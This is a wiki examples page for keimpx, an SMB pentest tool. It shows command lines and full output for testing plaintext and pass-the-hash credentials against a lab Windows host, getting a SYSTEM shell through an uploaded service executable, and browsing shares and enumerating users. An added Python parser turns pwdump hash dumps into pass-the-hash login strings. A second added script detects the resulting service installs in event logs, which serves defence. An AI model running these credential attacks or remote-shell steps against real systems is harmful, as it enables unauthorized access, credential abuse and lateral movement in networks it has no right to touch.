
Examples

inquisb edited this page Jun 26, 2012 · 1 revision


Test whether a single username/plain-text password pair is valid on a single system

$ python keimpx.py -t 172.16.77.130 -U Administrator -P testpass -v 1 -b
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    
[16:49:35] [INFO] Loading targets
[16:49:35] [INFO] Loading credentials
[16:49:35] [INFO] Loading domains
[16:49:35] [INFO] Loaded 1 unique targets
[16:49:35] [INFO] Loaded 1 unique credentials
[16:49:35] [INFO] No domains specified, using NULL domain
[16:49:35] [INFO] Attacking host 172.16.77.130:445
[16:49:35] [INFO] Valid credentials on 172.16.77.130:445: Administrator/testpass
[16:49:35] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 1 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/testpass


USER SORTED RESULTS:

Administrator/testpass
  172.16.77.130:445

Test whether dumped hashes are valid on a single system, then interact with it

$ cat /tmp/hashes_and_plain
# Lines as output by fgdump (pwdump format: user:rid:LM hash:NT hash:::)
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    
[15:53:23] [INFO] Loading targets
[15:53:23] [INFO] Loading credentials
[15:53:23] [INFO] Loading domains
[15:53:23] [INFO] Loaded 1 unique targets
[15:53:23] [INFO] Loaded 4 unique credentials
[15:53:23] [INFO] No domains specified, using NULL domain
[15:53:23] [INFO] Attacking host 172.16.77.130:445
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239)
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass
[15:53:23] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 3 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  testuser/testpass


USER SORTED RESULTS:

Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  172.16.77.130:445

ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  172.16.77.130:445

testuser/testpass
  172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 3
[15:53:46] [INFO] type 'help' for help menu
# shares
[1] print$ (type: 0, comment: Printer Drivers)
[2] C$ (type: 0, comment: Default share)
[3] CanonMP9 (type: 1, comment: Canon MP980 series Printer)
[4] share (type: 0, comment: )
[5] C (type: 0, comment: )
[6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1))
[7] IPC$ (type: 3, comment: Remote IPC)
[8] ADMIN$ (type: 0, comment: Remote Admin)
Which share do you want to connect to? (default 1) 2
# dir
Wed Sep 19 10:11:41 2007	     	   	AUTOEXEC.BAT
Sat Sep 12 15:38:04 2009	     	208	boot.ini
[...]
# exit
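The credential file above mixes three kinds of line: fgdump/pwdump hash lines (user:rid:LM:NT:::), the NO PASSWORD placeholder fgdump writes when a hash is absent (which keimpx reports as Guest/BLANK), and "user password" plain-text lines, with comments in between. The following parser is an added example, not keimpx's own loader; the Credential class, the function names and the dedup-by-label rule are assumptions made for illustration, and the sample file is the one from this page. The empty-password LM and NT hash constants substituted for placeholders are the well-known values that Impacket-based tools expect when one half of the pair is missing.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample input copied from the page (constructed test data, not real hashes).
SAMPLE_FILE = """\
# Lines output of fgdump
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass
"""

# pwdump/fgdump line; the trailing ':::' distinguishes it from a plain-text line.
PWDUMP_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[^:]*):(?P<nt>[^:]*):::")
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{32}$")
# Hashes of the empty password: what to pass when fgdump printed a placeholder.
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"


@dataclass
class Credential:  # hypothetical container, not a keimpx type
    user: str
    password: Optional[str] = None  # set for plain-text entries only
    lmhash: Optional[str] = None    # None when fgdump printed NO PASSWORD
    nthash: Optional[str] = None

    @property
    def is_hash(self) -> bool:
        return self.password is None

    def __str__(self) -> str:  # mirrors the user/secret labels keimpx prints
        if not self.is_hash:
            return f"{self.user}/{self.password}"
        if self.lmhash is None and self.nthash is None:
            return f"{self.user}/BLANK"
        return f"{self.user}/{self.lmhash or 'BLANK'}:{self.nthash or 'BLANK'}"


def _hash_field(value: str, lineno: int) -> Optional[str]:
    """Normalise one hash column: placeholder -> None, hex -> upper-case, else error."""
    if value == "" or value.upper().startswith("NO PASSWORD"):
        return None
    if not HEX32_RE.match(value):
        raise ValueError(f"line {lineno}: {value!r} is not a 32-hex-digit hash")
    return value.upper()


def parse_credentials(text: str) -> List[Credential]:
    """Parse a mixed hash/plain-text credential file, dropping exact duplicates."""
    creds: List[Credential] = []
    seen = set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = PWDUMP_RE.match(line)
        if m:
            cred = Credential(m.group("user"),
                              lmhash=_hash_field(m.group("lm"), lineno),
                              nthash=_hash_field(m.group("nt"), lineno))
        else:
            # Plain-text line: first token is the user, the rest is the password
            # (so passwords may contain spaces). A lone token is rejected as ambiguous.
            parts = line.split(None, 1)
            if len(parts) != 2:
                raise ValueError(f"line {lineno}: expected 'user password', got {line!r}")
            cred = Credential(parts[0], password=parts[1])
        if str(cred) in seen:
            continue
        seen.add(str(cred))
        creds.append(cred)
    return creds


def impacket_hashes(cred: Credential) -> str:
    """'lmhash:nthash' string for a pass-the-hash login, filling placeholders
    with the empty-password hashes so the pair is always well-formed."""
    if not cred.is_hash:
        raise ValueError("plain-text credential has no hashes")
    return f"{cred.lmhash or EMPTY_LM}:{cred.nthash or EMPTY_NT}"


if __name__ == "__main__":
    for c in parse_credentials(SAMPLE_FILE):
        print(c, "" if not c.is_hash else f"-> {impacket_hashes(c)}")
```

Run against the page's file this yields the same four unique credentials keimpx reports ("Loaded 4 unique credentials"), with Guest rendered as Guest/BLANK. The lm:nt string from impacket_hashes() is the form Impacket's SMBConnection.login() takes in its lmhash/nthash arguments, which is what makes a dumped hash "useful" without ever cracking it.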

Test whether dumped hashes are valid on a single system, then spawn a command prompt

$ cat /tmp/hashes_and_plain
# Lines as output by fgdump (pwdump format: user:rid:LM hash:NT hash:::)
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    
[15:53:23] [INFO] Loading targets
[15:53:23] [INFO] Loading credentials
[15:53:23] [INFO] Loading domains
[15:53:23] [INFO] Loaded 1 unique targets
[15:53:23] [INFO] Loaded 4 unique credentials
[15:53:23] [INFO] No domains specified, using NULL domain
[15:53:23] [INFO] Attacking host 172.16.77.130:445
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239)
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass
[15:53:23] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 3 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  testuser/testpass


USER SORTED RESULTS:

Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  172.16.77.130:445

ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  172.16.77.130:445

testuser/testpass
  172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 1
[15:53:46] [INFO] type 'help' for help menu
# shell
[16:53:07] [INFO] Uploading the service executable to 'ADMIN$\ihtell.exe'
[16:53:07] [INFO] Connecting to the SVCCTL named pipe
[16:53:07] [INFO] Creating the service 'uYRYKB'
[16:53:07] [INFO] Starting the service 'uYRYKB'
[16:53:07] [INFO] Connecting to backdoor on port 2090, wait..
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 3:

   Connection-specific DNS Suffix  . : localdomain
   IP Address. . . . . . . . . . . . : 172.16.77.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.77.2

C:\WINDOWS\system32>exit
exit
[16:53:20] [INFO] Connecting to the SVCCTL named pipe
[16:53:20] [INFO] Stopping the service 'uYRYKB'
[16:53:20] [INFO] Deleting the service 'uYRYKB'
[16:53:20] [INFO] Removing the service executable 'ADMIN$\ihtell.exe'
# exit
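The shell above is a PsExec-style remote service: the log shows the executable uploaded to ADMIN$ (which maps to %SystemRoot%, C:\WINDOWS on this target), a service with a random name created and started over the SVCCTL pipe, a bind shell on 2090/tcp, and, on exit, the service and file removed. keimpx cleans up the service and the binary, but the event log entries remain: a 7045 "service installed" event in the System log and, where the "Detailed File Share" audit subcategory is enabled, 5145 events for the write to ADMIN$. The detection pass below is an added example, not part of keimpx; the event records are constructed from the names visible on this page (service uYRYKB, binary ihtell.exe, port 2090), the field names follow the Windows EventData names for 5145 and 7045, and the "short alphabetic name" and "binary directly under C:\WINDOWS" heuristics are assumptions derived from that output, not a published signature.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample events (not real logs), in time order as an export would be.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "5145", "Channel": "Security", "Time": "16:53:07",
     "SubjectUserName": "Administrator", "IpAddress": "172.16.77.1",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "ihtell.exe",
     "AccessMask": "0x2"},
    {"EventID": "7045", "Channel": "System", "Time": "16:53:07",
     "ServiceName": "uYRYKB", "ImagePath": r"C:\WINDOWS\ihtell.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": "7045", "Channel": "System", "Time": "09:12:00",
     "ServiceName": "Spooler", "ImagePath": r"C:\WINDOWS\system32\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": "5145", "Channel": "Security", "Time": "10:00:00",
     "SubjectUserName": "jdoe", "IpAddress": "172.16.77.50",
     "ShareName": r"\\*\share", "RelativeTargetName": "report.docx",
     "AccessMask": "0x1"},
]

# Heuristic (assumed): the names keimpx generated on this page are 6 letters long.
RANDOM_NAME_RE = re.compile(r"^[A-Za-z]{4,8}$")
# Heuristic (assumed): a service binary sitting directly in %SystemRoot% rather than a
# subdirectory is what an upload to ADMIN$ produces. Assumes %SystemRoot% = C:\WINDOWS.
SYSROOT_EXE_RE = re.compile(r"^[A-Za-z]:\\WINDOWS\\[^\\]+\.exe$", re.IGNORECASE)
WRITE_DATA = 0x2  # ACCESS_MASK bit WriteData/AddFile as reported in 5145 events


def _basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def _stem(path: str) -> str:
    base = _basename(path)
    return base[:-4] if base.endswith(".exe") else base


def detect_remote_service_install(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag 7045 service installs that look like a PsExec-style remote shell,
    correlating each with any earlier write to ADMIN$ recorded in a 5145 event."""
    admin_writes: Dict[str, Dict[str, str]] = {}
    findings: List[Dict[str, str]] = []
    for ev in events:
        eid = int(ev.get("EventID", "0"))
        if eid == 5145:
            share = ev.get("ShareName", "").upper()
            if share.endswith("\\ADMIN$") and int(ev.get("AccessMask", "0"), 16) & WRITE_DATA:
                admin_writes[_basename(ev.get("RelativeTargetName", ""))] = ev
        elif eid == 7045:
            image = ev.get("ImagePath", "").strip('"')
            name = ev.get("ServiceName", "")
            reasons = []
            if SYSROOT_EXE_RE.match(image):
                reasons.append("service binary placed directly in %SystemRoot% (ADMIN$)")
            if RANDOM_NAME_RE.match(name) and RANDOM_NAME_RE.match(_stem(image)):
                reasons.append("short alphabetic service and binary names")
            src = admin_writes.get(_basename(image))
            if src:
                reasons.append(f"binary written over SMB by {src['SubjectUserName']} "
                               f"from {src['IpAddress']}")
            # A single weak indicator (Spooler also has a short name) is not enough.
            if len(reasons) >= 2:
                findings.append({"service": name, "image": image,
                                 "source_ip": src["IpAddress"] if src else "",
                                 "reasons": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    for f in detect_remote_service_install(SAMPLE_EVENTS):
        print(f"{f['service']} ({f['image']}) from {f['source_ip'] or '?'}: {f['reasons']}")
```

Requiring two independent indicators keeps the Spooler install out of the results while the uYRYKB install is flagged with the SMB source address. Legitimate installers that drop a service binary into %SystemRoot% will still match, so treat hits as triage leads to pair with the 7036 start/stop events and the listening port, not as proof on their own.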

Use a known-valid pair of credentials to interact with the system directly

$ python keimpx.py -t 172.16.77.130 -U Administrator -P validpassword
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    

The credentials worked in total 1 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/validpassword


USER SORTED RESULTS:

Administrator/validpassword
  172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 
Which credentials do you want to use to connect?
[1] Administrator/validpassword
> 
# help
Generic options
===============
help - show this message
verbosity {level} - set verbosity level (0-2)
info - list system information
exit - terminates the SMB session and exits the tool

Shares options
==============
shares - list available shares
use {sharename} - connect to a specific share
cd {path} - changes the current directory to {path}
pwd - shows current remote directory
ls {path} - lists all the files in the current directory
cat {file} - display content of the selected file
download {filename} - downloads the file from the current remote path
upload {filename} - uploads the local file into the current remote path
mkdir {dirname} - creates the directory under the current path
rm {file} - removes the selected file
rmdir {dirname} - removes the directory under the current path

Services options
================
deploy {service name} {local file} [service args] - remotely deploy a service executable
undeploy {service name} {remote file} - remotely undeploy a service executable

Shell options
=============
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp

Users options
=============
users [domain] - list users, optionally for a specific domain
pswpolicy [domain] - list password policy, optionally for a specific domain
domains - list the domains the system is part of

Registry options (Soon)
================
regread {registry key} - read a registry key
regwrite {registry key} {registry value} - add a value to a registry key
regdelete {registry key} - delete a registry key

# shares
[1] print$ (type: 0, comment: Printer Drivers)
[2] C$ (type: 0, comment: Default share)
[3] CanonMP9 (type: 1, comment: Canon MP980 series Printer)
[4] share (type: 0, comment: )
[5] C (type: 0, comment: )
[6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1))
[7] IPC$ (type: 3, comment: Remote IPC)
[8] ADMIN$ (type: 0, comment: Remote Admin)
Which share do you want to connect to? (default 1) 2
# dir
Wed Sep 19 10:11:41 2007	     	   	AUTOEXEC.BAT
Sat Sep 12 15:38:04 2009	     	208	boot.ini
[...]
# cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /fastdetect /NoExecute=OptOut
# cd Windows\Temp
# dir
Fri Nov  6 18:30:15 2009	<DIR>	   	.
Fri Nov  6 18:30:15 2009	<DIR>	   	..
Wed May  6 12:51:52 2009	<DIR>	   	Cookies
Wed May  6 12:51:52 2009	<DIR>	   	History
Wed May  6 12:51:52 2009	<DIR>	   	Temporary Internet Files
# !ls    <- prepending an exclamation mark runs the command on your local system instead of the target
contrib
keimpx.py
setup.py

# upload keimpx.py
# dir
Thu Nov 12 15:36:02 2009	<DIR>	   	.
Thu Nov 12 15:36:02 2009	<DIR>	   	..
Wed May  6 12:51:52 2009	<DIR>	   	Cookies
Wed May  6 12:51:52 2009	<DIR>	   	History
Thu Nov 12 15:36:02 2009	     	45838	keimpx.py
Wed May  6 12:51:52 2009	<DIR>	   	Temporary Internet Files
# users
Administrator
  User ID: 500
  Group ID: 513
  Enabled: True
  Logon count: 187
  Last Logon: Thu, 12 Nov 2009 15:37:13
  Kickoff: Mon, 14 Sep 2009 10:15:47
  Password can change: Mon, 14 Sep 2009 10:15:47
  Password must change: Infinity
  Bad password count: 0
  Logon hours: Unlimited
  Account Name: Administrator
  Description: Built-in account for administering the computer/domain
ASPNET
  User ID: 1003
  Group ID: 513
[...]
# domains
Domains:
  W2K3DEV
  Builtin
# exit

If you have any questions, please refer to this wiki page before opening a new ticket or getting in touch with the author.